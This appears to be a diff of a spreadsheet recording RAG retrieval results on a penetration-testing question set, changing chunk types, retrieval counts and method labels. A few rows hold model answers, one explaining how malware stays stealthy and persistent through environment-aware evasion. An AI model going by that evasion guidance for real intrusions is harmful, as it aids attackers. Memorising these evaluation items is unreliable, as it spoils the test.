@@ -8264,10 +8259,10 @@
       <c r="H117" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: f971e074-81e8-4330-b662-e293762c3f9c, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: d7c6b93b-b9fd-435f-a3da-ab60cf8385fe, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 8)
@@ -8277,7 +8272,7 @@
       </c>
       <c r="I117" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J117" t="n">
@@ -8285,7 +8280,7 @@
       </c>
       <c r="K117" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -8330,21 +8325,21 @@
       </c>
       <c r="H118" t="inlineStr">
         <is>
-          <t>preemware_pentestingeval.pdf (Chunk: 9686cf15-5df0-49f8-9592-fef3f765639f, Type: dense, Rank: 1)
+          <t>preemware_pentestingeval.pdf (Chunk: 9686cf15-5df0-49f8-9592-fef3f765639f, Type: sparse, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 976bc6d1-b057-4f92-adc9-777e85c542b4, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 5f1aed82-6985-429f-a6a1-e86bd394b0ff, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: e62a2b2b-31c7-42d4-91f0-d8e3c1852d64, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I118" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J118" t="n">
@@ -8352,7 +8347,7 @@
       </c>
       <c r="K118" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -8404,14 +8399,14 @@
 preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 76451418-5bee-4e13-b950-55a69470f2ad, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I119" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J119" t="n">
@@ -8419,7 +8414,7 @@
       </c>
       <c r="K119" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -8476,15 +8471,15 @@
 preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 3ccb15c1-6838-47fc-9d99-4688fd8d9037, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 0033091a-4bc5-4dc0-8bc4-f4e58cb7f03b, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 76451418-5bee-4e13-b950-55a69470f2ad, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I120" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J120" t="n">
@@ -8492,7 +8487,7 @@
       </c>
       <c r="K120" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -8527,15 +8522,7 @@
       <c r="F121" t="inlineStr">
         <is>
           <t>Answer: Using a custom evasion technique that leverages environmental awareness
-Explanation: In the context of advanced persistent threat (APT) activities, using a custom evasion technique
-that leverages environmental awareness is the most effective method for enhancing the stealth and persistence
-of malware once it has infiltrated a high-security network. This method involves adapting the malware's behavior
-based on the specific characteristics or defenses of the target environment, allowing it to avoid detection and
-mitigation efforts more effectively. Utilizing well-known public exploits without modification makes the
-malware easily recognizable by updated antivirus and intrusion prevention systems. Employing frequent payload
-encryption only addresses the issue of payload detection, not evasion or persistence. Relying solely on social
-engineering attacks is a method for gaining initial access but does not directly enhance the stealth and
-persistence of malware once it has infiltrated a network.</t>
+Explanation: In the context of advanced persistent threat (APT) activities, using a custom evasion technique that leverages environmental awareness is the most effective method for enhancing the stealth and persistence of malware once it has infiltrated a high-security network. This method involves adapting the malware's behavior based on the specific characteristics or defenses of the target environment, allowing it to avoid detection and mitigation efforts more effectively. Utilizing well-known public exploits without modification makes the malware easily recognizable by updated antivirus and intrusion prevention systems. Employing frequent payload encryption only addresses the issue of payload detection, but it does not directly impact the stealth or persistence of the malware in a high-security environment. Relying solely on social engineering attacks may be effective for gaining initial access, but it does not enhance the stealth and persistence of the malware once it has already infiltrated the network.</t>
         </is>
       </c>
       <c r="G121" t="inlineStr">
@@ -8552,14 +8539,14 @@
 preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I121" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J121" t="n">
@@ -8567,7 +8554,7 @@
       </c>
       <c r="K121" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -8620,13 +8607,13 @@
 cowWhySo-pentest-redteam-steering.md (Chunk: 2adf5b13-acd1-4857-8668-d2f97c83399d, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 5177461e-afd1-4f30-b34b-33dd723a5123, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I122" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J122" t="n">
@@ -8634,7 +8621,7 @@
       </c>
       <c r="K122" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -8685,15 +8672,15 @@
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I123" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J123" t="n">
@@ -8701,7 +8688,7 @@
       </c>
       <c r="K123" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -8752,7 +8739,7 @@
 preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: da8d5790-4c9c-4230-96d7-cd1f71b7c89c, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: dense, Rank: 10)</t>
@@ -8760,7 +8747,7 @@
       </c>
       <c r="I124" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J124" t="n">
@@ -8768,7 +8755,7 @@
       </c>
       <c r="K124" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -8803,16 +8790,7 @@
       <c r="F125" t="inlineStr">
         <is>
           <t>Answer: ASLR (Address Space Layout Randomization)
-Explanation: Address Space Layout Randomization (ASLR) is the most effective among the listed options for
-hindering a return-oriented programming (ROP) attack. ROP attacks rely on finding and executing gadgets
-(small snippets of code ending in a return instruction) that already exist in system memory. ASLR randomizes
-the memory addresses where system and application code is loaded, making it significantly difficult for
-attackers to predict where their required gadgets are located, thus disrupting the attack. DEP (Data Execution
-Prevention) can prevent execution of code from non-executable memory regions but does not specifically
-target ROP attacks. Canary-based stack protection is used to detect buffer overflow attacks by monitoring
-changes in memory, but it doesn't directly address ROP attacks. Sandboxing isolates programs and processes
-from the rest of the system, making it difficult for malicious code to spread or persist, but it does not
-specifically target ROP attacks.</t>
+Explanation: Address Space Layout Randomization (ASLR) is the most effective among the listed options for hindering a return-oriented programming (ROP) attack. ROP attacks rely on finding and executing gadgets (small snippets of code ending in a return instruction) that already exist in system memory. ASLR randomizes the memory addresses where system and application code is loaded, making it significantly difficult for attackers to predict where their required gadgets are located, thus disrupting the attack. DEP and Canary-based stack protection can also help mitigate ROP attacks but are less effective than ASLR in this context. Sandboxing is a technique used to isolate code execution environments, which can be useful for preventing certain types of attacks, but it does not specifically target or prevent ROP attacks.</t>
         </is>
       </c>
       <c r="G125" t="inlineStr">
@@ -8824,19 +8802,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: d299dde0-8cde-40ef-988a-6582c6a85a86, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 8b0f324f-7120-43b9-ab53-e5747f2231ae, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 9686cf15-5df0-49f8-9592-fef3f765639f, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 7920f5e1-2a4b-4504-8b29-237fe6a6f0e8, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 9b3ce6f9-42f5-4df6-a5ae-9070e935f278, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 7920f5e1-2a4b-4504-8b29-237fe6a6f0e8, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 9b3ce6f9-42f5-4df6-a5ae-9070e935f278, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I125" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J125" t="n">
@@ -8844,7 +8822,7 @@
       </c>
       <c r="K125" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -8892,18 +8870,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 2284c68d-f358-4abf-bedb-673c5c8ca0d7, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 28d10b6c-0649-4116-81ed-72fe66e40d18, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: ca5d3a49-3c09-4a73-8dbf-43188a8e0fdf, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: ca5d3a49-3c09-4a73-8dbf-43188a8e0fdf, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 60ebd270-998c-47f2-98a3-628070e318cb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 60ebd270-998c-47f2-98a3-628070e318cb, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 73ad948f-984e-4fd2-b5af-5e206fd07d65, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 73ad948f-984e-4fd2-b5af-5e206fd07d65, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I126" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J126" t="n">
@@ -8911,7 +8889,7 @@
       </c>
       <c r="K126" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -8964,13 +8942,13 @@
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I127" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J127" t="n">
@@ -8978,7 +8956,7 @@
       </c>
       <c r="K127" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9030,14 +9008,14 @@
 preemware_pentestingeval.pdf (Chunk: eb7215a5-fd15-459f-95a3-bdedf78fb5c9, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: aadf4df9-3925-4bce-85a2-9df3030ade1e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: aadf4df9-3925-4bce-85a2-9df3030ade1e, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I128" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J128" t="n">
@@ -9045,7 +9023,7 @@
       </c>
       <c r="K128" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9098,19 +9076,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 18e2ae8c-7b32-42a9-9045-7872388878c2, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I129" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J129" t="n">
@@ -9118,7 +9096,7 @@
       </c>
       <c r="K129" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -9153,7 +9131,7 @@
       <c r="F130" t="inlineStr">
         <is>
           <t>Answer: Static Analysis
-Explanation: Static Analysis is the most suitable technique for examining encrypted payloads within a malware binary without executing the code. This method involves reviewing the code, binaries, and associated data, to extract information and potentially identify and analyze malicious sections such as encrypted payloads. Static analysis does not involve running the suspect code, therefore, it carries less risk of accidentally triggering malicious behavior. Dynamic Analysis, in contrast, involves executing the malware in a controlled environment to observe its behavior, which is not optimal for initial analysis of encrypted payloads. Hybrid Analysis combines elements of both static and dynamic techniques but can be overkill for initial analysis. Automated Code Review is not typically used for this purpose as it focuses on code quality rather than malicious intent or encrypted payloads.</t>
+Explanation: Static Analysis is the most suitable technique for examining encrypted payloads within a malware binary without executing the code. This method involves reviewing the code, binaries, and associated data, to extract information and potentially identify and analyze malicious sections such as encrypted payloads. Static analysis does not involve running the suspect code, therefore, it carries less risk of accidentally triggering malicious behavior. Dynamic Analysis, in contrast, involves executing the malware in a controlled environment to observe its behavior, which is not optimal for initial analysis of encrypted payloads. Hybrid Analysis combines elements of both static and dynamic techniques but can be overkill for initial analysis. Automated Code Review is not typically used for this purpose as it focuses on code quality rather than malicious content identification.</t>
         </is>
       </c>
       <c r="G130" t="inlineStr">
@@ -9165,19 +9143,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 3ccb15c1-6838-47fc-9d99-4688fd8d9037, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 3ccb15c1-6838-47fc-9d99-4688fd8d9037, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 94e49890-47aa-4ca3-9707-9d1cb00040dc, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 7ea14143-5006-4460-8551-02e670eeceb2, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 0033091a-4bc5-4dc0-8bc4-f4e58cb7f03b, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 7ea14143-5006-4460-8551-02e670eeceb2, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 0033091a-4bc5-4dc0-8bc4-f4e58cb7f03b, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I130" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J130" t="n">
@@ -9185,7 +9163,7 @@
       </c>
       <c r="K130" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
